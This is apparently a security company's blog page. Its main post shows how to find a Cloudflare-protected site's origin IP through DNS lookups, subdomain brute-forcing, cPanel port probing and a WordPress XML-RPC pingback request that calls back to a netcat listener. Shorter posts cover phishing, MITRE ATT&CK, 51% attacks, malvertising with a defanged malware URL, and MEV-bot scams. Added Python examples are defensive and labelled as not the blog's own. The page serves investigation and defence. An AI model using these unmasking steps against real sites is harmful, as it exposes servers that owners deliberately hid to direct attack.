Categories
Alvosec

How to find the IP address of a website behind Cloudflare

WARNING: The content of this article is intended for testing purposes or for investigating fraudulent websites. Any actions taken based on the information provided here are at the reader’s own risk.

Reverse proxy services like Cloudflare can improve a website’s speed and security by adding an additional layer of protection. This also provides a level of anonymity, as the hosting provider and other information about the website are concealed.

With a reverse proxy service in place, it becomes challenging, or even impossible, for external parties to determine the website’s hosting provider. This anonymity allows content owners to conceal the source IP address of their server and safeguard it from potential attacks.

How to find the actual hosting provider of a website protected by Cloudflare

Finding the actual hosting provider of a website using a reverse proxy service like Cloudflare requires searching for evidence of past or current misconfigurations. It is crucial to understand the ways a website owner might leave behind a trail and, if you are the site owner, to take measures to maintain anonymity. For instance, the original web server’s IP may have remained unchanged or unsecured, which could indicate that the hosting provider has not been altered. In the case that the IP was changed, it’s possible that the hosting provider’s IP neighborhood remained the same before transitioning to use Cloudflare as a front end.

1. Check DNS records

Check the website’s DNS records: The first step is to look at the domain name system (DNS) records of the website in question. These records contain information about the website’s IP address, and you can use online tools like Whois or Dig to look them up. If you see multiple IP addresses listed, it’s likely that one of them belongs to the real website host, while the others are Cloudflare’s IP addresses.

dig example.com

or look up the MX records:

dig mx example.com

2. Investigate subdomains

First locate all subdomains, which can be done by brute-forcing subdomain names. You can use Nmap with the dns-brute script:

nmap --script dns-brute example.com

or you can simply use any tool available to enumerate subdomains:

dnsenum example.com

A highly effective method of obtaining subdomains is through enumeration using the Certificate Transparency logs stored by Censys. Remember to check for SANs – Subject Alternative Name.
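If you are the site owner, the DNS evidence described in steps 1 and 2 is exactly what you should audit yourself. The following Python is an added example, not Alvosec's tooling: it takes records in the shape dig or dnsenum print them and flags anything that does not point at a Cloudflare edge address. The record set is constructed, and the Cloudflare range list is a snapshot that must be refreshed from https://www.cloudflare.com/ips-v4 before real use.

```python
import ipaddress

# Snapshot of Cloudflare's published IPv4 ranges. Assumption: current only as
# of writing; refresh it from https://www.cloudflare.com/ips-v4 before relying on it.
CLOUDFLARE_V4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

def is_cloudflare(ip):
    """True if the IPv4 address falls inside one of the snapshotted ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_V4)

def audit_records(records):
    """records: iterable of (name, rtype, value) as read from dig/dnsenum output.
    Returns findings as (name, rtype, value, reason); an empty list means every
    address seen is fronted by Cloudflare."""
    findings = []
    for name, rtype, value in records:
        rtype = rtype.upper()
        if rtype == "A":
            try:
                exposed = not is_cloudflare(value)
            except ValueError:
                findings.append((name, rtype, value, "unparseable address"))
                continue
            if exposed:
                findings.append((name, rtype, value, "address outside Cloudflare ranges"))
        elif rtype == "AAAA":
            findings.append((name, rtype, value, "IPv6: check against ips-v6 list"))
        elif rtype in ("MX", "CNAME", "NS"):
            # These name another host; resolve it and audit that address as well.
            findings.append((name, rtype, value, f"{rtype} names a host to resolve and re-check"))
    return findings

# Constructed sample zone, not real lookups (203.0.113.0/24 and 198.51.100.0/24
# are documentation ranges).
SAMPLE_RECORDS = [
    ("example.com", "A", "104.16.132.229"),     # Cloudflare edge
    ("www.example.com", "A", "172.67.10.4"),    # Cloudflare edge
    ("example.com", "MX", "mail.example.com"),
    ("mail.example.com", "A", "203.0.113.10"),  # mail host on the origin network
    ("dev.example.com", "A", "198.51.100.7"),   # forgotten staging host
]

if __name__ == "__main__":
    for finding in audit_records(SAMPLE_RECORDS):
        print("EXPOSED?", *finding)
```

Every finding is a record that bypasses the proxy: the fix is either to proxy that name through Cloudflare too, to drop it, or to accept that the host is public and firewall it so that it only answers to Cloudflare's ranges.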

3. Find web applications that may expose IP address

Finding the real IP behind a web application means determining the actual network location of the server hosting the website, as opposed to the domain name or URL used to access it. This can be accomplished through fuzzing.

For example, try example.com/cpanel on port 2083 (the cPanel port).

Anything listening on a different port can expose the IP address, so search for any third-party application that is listening on a non-standard port.

4. Use online service

Examining the domain history can also be beneficial, as sometimes the NS records are redirected to Cloudflare without altering the hosting provider.

Another possibility is to use something like Securitytrails to check a domain’s DNS history.

5. Discover IP through API calls on WordPress websites

Discovering an IP address can be done by using pingback XMLRPC calls. The pingback feature in WordPress allows a website to notify another website that it has linked to it. The notification is sent via an XMLRPC call to the target website, which can reveal its IP address.

Copy and paste the following template into the XML content text area of this website, or save it as a file named ping.xml. The XML-RPC method name is pingback.ping; <IP> is a placeholder for the address of the listener you set up below.

<?xml version="1.0" ?>
<methodCall>
<methodName>pingback.ping</methodName>
<params>
 <param>
  <value>
<string>http://<IP>/</string>
  </value>
 </param>
 <param>
  <value>
<string>https://site.com/</string>
  </value>
 </param>
</params>
</methodCall>

Execute the following command, replacing ‘https://example.com/xmlrpc.php’ with the xmlrpc.php URL of the target WordPress site and using ‘ping.xml’ as the relative path to the file you just created.

curl -X POST -d @ping.xml https://example.com/xmlrpc.php

In a separate terminal window, execute the following command. It will wait for a connection from the target WordPress server. ‘sudo’ is required because port 80 is a privileged port (ports below 1024 are reserved for root).

sudo netcat -v -l -p 80

Once the command (curl) has been executed, wait for a short period for the data to appear in your netcat session. You should see something like this:

GET /hello/world HTTP/1.1
Host: 10.0.0.1
User-Agent: WordPress/6.1.1; http://example.com
Accept: */*
Accept-Encoding: deflate, gzip, br
Referer: http://10.0.0.1/hello/world
X-Pingback-Forwarded-For: 127.0.0.1
Connection: close
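From the site owner's side, the request above is what a WAF or a small pre-filter in front of xmlrpc.php needs to recognise. The following Python is an added example, not code from Alvosec or from WordPress: it parses an XML-RPC body, identifies pingback.ping calls, and either blocks them outright or, where pingbacks are wanted, blocks those whose source URL is a raw IP literal, which is the shape of the template above. The sample bodies are constructed; xml.etree is used for brevity, and a production filter should use defusedxml to resist entity-expansion payloads.

```python
import ipaddress
import xml.etree.ElementTree as ET   # use defusedxml in production (entity expansion)
from urllib.parse import urlparse

# Constructed sample bodies, not captured traffic.
PINGBACK_TO_IP = """<?xml version="1.0"?>
<methodCall>
 <methodName>pingback.ping</methodName>
 <params>
  <param><value><string>http://203.0.113.5/</string></value></param>
  <param><value><string>https://blog.example/2023/01/post/</string></value></param>
 </params>
</methodCall>"""

PINGBACK_FROM_HOST = PINGBACK_TO_IP.replace("http://203.0.113.5/", "https://news.example/story/")

OTHER_CALL = """<?xml version="1.0"?>
<methodCall>
 <methodName>wp.getUsersBlogs</methodName>
 <params><param><value><string>user</string></value></param></params>
</methodCall>"""

def parse_call(body):
    """Return (methodName, [string params]) from an XML-RPC methodCall body."""
    root = ET.fromstring(body)
    method = (root.findtext("methodName") or "").strip()
    params = [v.text or "" for v in root.findall("./params/param/value/string")]
    return method, params

def inspect_xmlrpc(body, allow_pingbacks=False):
    """Decide ('allow' | 'block', reason) for one POST to xmlrpc.php."""
    try:
        method, params = parse_call(body)
    except ET.ParseError:
        return "block", "malformed XML-RPC body"
    if method != "pingback.ping":
        return "allow", f"{method} is not a pingback"
    if not allow_pingbacks:
        return "block", "pingbacks disabled by policy"
    # The first param is the source URI WordPress would fetch. A raw IP literal
    # there is the signature of address-disclosure probing, not a real blog link.
    host = urlparse(params[0] if params else "").hostname or ""
    if not host:
        return "block", "pingback without a source host"
    try:
        ipaddress.ip_address(host)
    except ValueError:
        return "allow", f"pingback from {host}"
    return "block", f"pingback source is an IP literal ({host})"

if __name__ == "__main__":
    for body in (PINGBACK_TO_IP, PINGBACK_FROM_HOST, OTHER_CALL):
        print(inspect_xmlrpc(body, allow_pingbacks=True))
```

Inside WordPress itself the equivalent mitigation is removing pingback.ping through the xmlrpc_methods filter, or disabling XML-RPC entirely when nothing uses it. Either way the origin should also be firewalled to accept traffic only from Cloudflare, because any outbound request the server makes will carry its real address.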

There are other methods for revealing the IP address hidden by Cloudflare, but they will be explained in a different article.

Cyber Threats on the Rise: Google Ads, IDN Domains and Hacked Social Media Accounts

Hackers are continuously evolving their tactics to steal sensitive information and financial assets. One of their recent advancements includes the use of Google ads, IDN domains, and hacking of trusted social media accounts.

Google ads provide a convenient platform for hackers to reach a large audience. They use phishing websites disguised as legitimate ones and promote them through Google ads to trick users into entering their personal information or financial details.

IDN domains, which allow the use of non-Latin characters in domain names, are also being abused by hackers. These domains can easily be made to look like well-known websites, making it easier for them to carry out phishing attacks.

Example of an IDN domain used in a phishing campaign

Internationalized Domain Names (IDNs) enable people around the world to use domain names in local languages and scripts.

Recently, hackers have been hacking popular social media accounts, such as Twitter, to promote their phishing websites. These websites often mimic popular cryptocurrency exchanges, allowing hackers to steal users’ crypto funds.

NFT Collection Azuki’s Twitter Account Hacked, Leading Followers to Malicious Link

To sum up, hackers are constantly improving their tactics to steal sensitive information and financial assets. It is important for users to be vigilant and not fall for these phishing scams. They should always verify the authenticity of a website before entering any personal information and use reputable security solutions to protect their online activities.

What is the MITRE ATT&CK Framework?

MITRE ATT&CK™ (Adversarial Tactics, Techniques, and Common Knowledge) is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. It is intended to provide a foundation for improving an organization’s cybersecurity posture by helping security teams understand the ways that adversaries may attempt to compromise their systems.

One of the key components of MITRE ATT&CK™ is the use of techniques to detect and respond to malicious activity on a network. Techniques are specific methods or actions that adversaries can use to achieve their objectives. For example, one technique might be the use of a specific type of malware, while another might be the use of a phishing email to steal credentials.

Sample of MITRE ATT&CK Techniques

To understand the role of these techniques in security detection, it’s important to understand how attackers work. Attackers will often use a combination of techniques to achieve their objectives, rather than relying on just one. For example, an attacker might use a phishing email to steal a user’s credentials, and then use that stolen information to gain access to the network. From there, the attacker might use malware to move laterally through the network, stealing data or disrupting operations.

To detect and respond to these types of attacks, security teams need to be able to identify the techniques being used by attackers, and to understand the potential impact of those techniques on their systems. This is where MITRE ATT&CK™ can be a valuable resource. By providing a detailed understanding of the techniques used by attackers, security teams can develop more effective detection and response strategies.

One way to use MITRE ATT&CK™ for detection is to map it to your existing security controls and identify gaps in coverage. Additionally, security teams can use it to identify the most likely techniques that would be used against their organization and prioritize the implementation of countermeasures accordingly.

To sum up, MITRE ATT&CK™ provides a comprehensive knowledge base of adversary tactics and techniques that can be used to improve an organization’s cybersecurity posture. By understanding the techniques used by attackers and how they may be used to compromise systems, security teams can develop more effective detection and response strategies.

What is a 51% attack?

A 51% attack is a type of malicious attack that can be carried out on a blockchain network. In a 51% attack, an attacker or group of attackers control more than 50% of the network’s mining power, also known as hashrate. With this level of control, the attacker can manipulate the blockchain’s transaction history, double-spend coins, and prevent new transactions from being confirmed.

The concept of a 51% attack is unique to blockchain networks, which rely on a decentralized network of computers to validate and record transactions. In a decentralized network, no single entity has complete control over the network. However, if an attacker can amass enough mining power, they can effectively take control of the network and manipulate it to their advantage.

One of the most significant risks of a 51% attack is the ability to double-spend coins. In a double-spend attack, the attacker sends coins to a merchant or exchange and then uses their control over the network to reverse the transaction and keep the coins. This can have a severe impact on the value of the cryptocurrency and the confidence of its users.

Another risk is that a 51% attack can be used to prevent new transactions from being confirmed. This can effectively halt the network and prevent legitimate transactions from being processed. This can also cause a loss of confidence in the network and its ability to function.

To prevent a 51% attack, blockchain networks rely on a decentralized network of computers to validate transactions. This makes it much more difficult for an attacker to amass enough mining power to control the network. In addition, many blockchain networks use algorithms that make it more difficult for an attacker to gain control of the network even if they do control more than 50% of the mining power.
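To see why the 50% line matters for the double-spend risk described above, here is the calculation from section 11 of the Bitcoin whitepaper, written out in Python as an added example that is not part of the original article: the probability that an attacker holding a fraction q of the hashrate ever catches up once the honest chain is z blocks ahead, and the number of confirmations a merchant needs before that probability drops below a chosen risk. The risk threshold of 0.1% is the one the whitepaper tabulates.

```python
import math

def catch_up_probability(q, z):
    """Probability that an attacker holding fraction q of the hashrate ever
    overtakes the honest chain once it is z blocks ahead (Bitcoin whitepaper,
    section 11). For q >= 0.5 the result is 1: the attacker out-mines everyone
    else and can always rewrite history, which is what a 51% attack exploits."""
    p = 1.0 - q
    if q >= p or z == 0:
        return 1.0
    lam = z * q / p                      # expected attacker blocks while honest miners find z
    total = 1.0
    for k in range(z + 1):
        poisson = math.exp(-lam)         # P(attacker has mined exactly k blocks so far)
        for i in range(1, k + 1):        # incremental lam^k / k! avoids float overflow
            poisson *= lam / i
        # from k blocks the attacker still has to close a gap of z - k,
        # which a minority miner manages with probability (q/p)^(z-k)
        total -= poisson * (1.0 - (q / p) ** (z - k))
    return total

def confirmations_needed(q, max_risk=0.001):
    """Smallest number of confirmations a merchant should wait for so that a
    double-spend by an attacker with hashrate q succeeds with probability below
    max_risk; None when no depth is ever safe (q >= 0.5)."""
    if q >= 0.5:
        return None
    z = 0
    while catch_up_probability(q, z) >= max_risk:
        z += 1
    return z

if __name__ == "__main__":
    for q in (0.1, 0.3, 0.45, 0.51):
        print(f"q={q}: P(catch up from 6 behind)={catch_up_probability(q, 6):.7f}, "
              f"confirmations for <0.1% risk: {confirmations_needed(q)}")
```

The output shows the asymmetry the article describes: a 10% miner is below a 0.1% success chance after 5 confirmations, a 30% miner needs 24, and once q reaches 0.5 no number of confirmations helps, because waiting only gives the attacker more time to build the longer chain.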

In conclusion, a 51% attack is a type of malicious attack that can be carried out on a blockchain network, where an attacker uses control over more than 50% of the network’s hashrate to manipulate the blockchain’s transaction history, double-spend coins, and prevent new transactions from being confirmed. To prevent a 51% attack, blockchain networks rely on a decentralized network of computers and use algorithms that make it more difficult for an attacker to gain control.

Fake Google ads can lead you to download malware

Malicious Google ads, also known as “malvertising,” are ads that have been designed to infect a user’s computer with malware. These ads can appear on any website that uses Google’s advertising network, including popular sites like YouTube and Gmail. Cybercriminals are tricking unsuspecting users into downloading malware that steals personal information by using malicious Google ads and web pages.

One common tactic used by attackers is to create a fake ad that looks like a legitimate download or update for a popular piece of software.

Another tactic is to use exploit kits, which are tools that exploit vulnerabilities in a user’s web browser or computer to install malware without their knowledge. Some exploit kits even use browser or operating system vulnerabilities that are not yet publicly known, known as zero-day vulnerabilities, to increase the chance of successful attacks.

Here is one example that we detected recently:

The ad will be displayed if you search for “obs download” or similar keywords.

OBS (Open Broadcaster Software) is free and open source software for video recording and live streaming.

When the victim clicks on that ad, they are redirected to obsproect[.]site (note the missing letter in the domain name and the wrong TLD); the original website is obsproject.com.
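The obsproect[.]site typosquat here and the IDN homograph domains from the earlier post on Google ads and IDN domains are two forms of the same lookalike problem, so one detector serves both. The following Python is an added example, not Alvosec's tooling: it refangs a defanged domain, decodes punycode labels, flags labels that mix scripts, maps a small hand-picked set of Cyrillic and Greek confusables onto their Latin lookalikes, and compares the result against a brand watch list by edit distance. The confusables subset and the brand list are constructed for illustration; a real deployment would use Unicode's full confusables table and its own brand list.

```python
import unicodedata

# Small hand-picked map of Cyrillic/Greek letters that render like Latin ones.
# Assumption: an illustrative subset, not Unicode's full confusables table.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u04cf": "l", "\u0456": "i", "\u0458": "j",
    "\u0455": "s", "\u0501": "d", "\u051b": "q", "\u051d": "w", "\u03bf": "o",
}

# Constructed watch list of brands to protect (a real one would be your own).
BRANDS = ["apple.com", "obsproject.com", "uniswap.org"]

def refang(domain):
    """Turn the defanged 'example[.]com' notation back into a real hostname."""
    return domain.strip().lower().replace("[.]", ".").strip(".")

def to_unicode(domain):
    """Decode xn-- labels so homoglyphs can be inspected; plain ASCII is unchanged."""
    return domain.encode("ascii").decode("idna") if domain.isascii() else domain

def scripts_in(label):
    """Set of Unicode script prefixes (LATIN, CYRILLIC, ...) used by the letters."""
    return {unicodedata.name(ch, "?").split(" ")[0] for ch in label if ch.isalpha()}

def skeleton(text):
    """Replace known confusables with the Latin letter they imitate."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)

def edit_distance(a, b):
    """Levenshtein distance, for catching dropped/swapped letters like obsproect."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def assess(domain, brands=BRANDS, max_edits=2):
    """Return the reasons a domain looks like a brand lookalike ([] if clean)."""
    d = to_unicode(refang(domain))
    reasons = []
    if not d.isascii():
        reasons.append("non-ASCII (IDN) domain")
    labels = d.split(".")
    for label in labels:
        if len(scripts_in(label)) > 1:
            reasons.append(f"mixed scripts in label '{label}'")
    if len(labels) < 2:
        return reasons
    raw_sld, tld = labels[-2], labels[-1]      # assumption: single-label TLDs only
    sld = skeleton(raw_sld)
    for brand in brands:
        bsld, btld = brand.rsplit(".", 1)
        dist = edit_distance(sld, bsld)
        if dist == 0:
            if sld != raw_sld:
                reasons.append(f"homoglyph of {brand}")
            elif tld != btld:
                reasons.append(f"{brand} name on a different TLD (.{tld})")
        elif dist <= max_edits:
            reasons.append(f"{dist} edit(s) from {brand}")
    return reasons

if __name__ == "__main__":
    for candidate in ("obsproect[.]site", "xn--pple-43d.com", "obsproject.com"):
        print(candidate, "->", assess(candidate) or "clean")
```

Run over newly observed domains from certificate-transparency feeds, ad-landing URLs or proxy logs, the reasons list is what you would turn into an alert; the edit-distance threshold of 2 is deliberately tight so that unrelated short names do not flood it.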

If the victim attempts to download software, they will be prompted with this URL:

https://bitbucket[.]org/fightcillo/downloads-forus/downloads/Setup.zip

Avoid opening or downloading any files from these websites!

After submitting the file to the VirusTotal service, we can see multiple indicators that the file has malicious behavior.

Behavioral analysis showed that the file has the characteristics of a trojan, meaning that attackers can steal any information from the infected user, including cryptocurrency assets.

According to one Twitter user, his computer was infected with malware when he clicked a sponsored link in a Google search while trying to download the streaming software OBS.

Not only did the hackers drain his crypto wallet of his NFTs and crypto, including his beloved Mutant Ape, but they also hijacked his accounts to send phishing links to his substantial following.

In conclusion, malicious Google ads are a serious threat to the security of your computer. By taking steps to protect yourself, such as keeping your software up to date and using ad-blockers and anti-virus software, you can reduce the risk of being infected with malware from these ads. It is important to be vigilant and cautious when browsing the internet, as attackers are constantly finding new ways to distribute malware through ads.

MEV bots are a scam – they will drain all of your deposits!

Beware of MEV bots on social media. These scams advertise themselves as a way to make money on Uniswap, often with a large number of views on YouTube. However, they are actually just proxy contracts that forward your ETH deposits to a bad actor’s account. These scams are successful because they deceive users into thinking that the smart contract can profit from DEX trades by monitoring the mempool and frontrunning transactions, but in reality it is just stealing your deposits. Be cautious of any contracts claiming to be UniswapLiquidityBots.

If it’s too good to be true, it probably is!

Here is a screenshot of a YouTube channel that promotes this type of scam:

A smart contract includes hidden parameters that allow an attacker to drain your deposits.

Harry.eth posted an interesting thread on Twitter regarding this scam.

https://twitter.com/sniko_/status/1549807252491706369?lang=en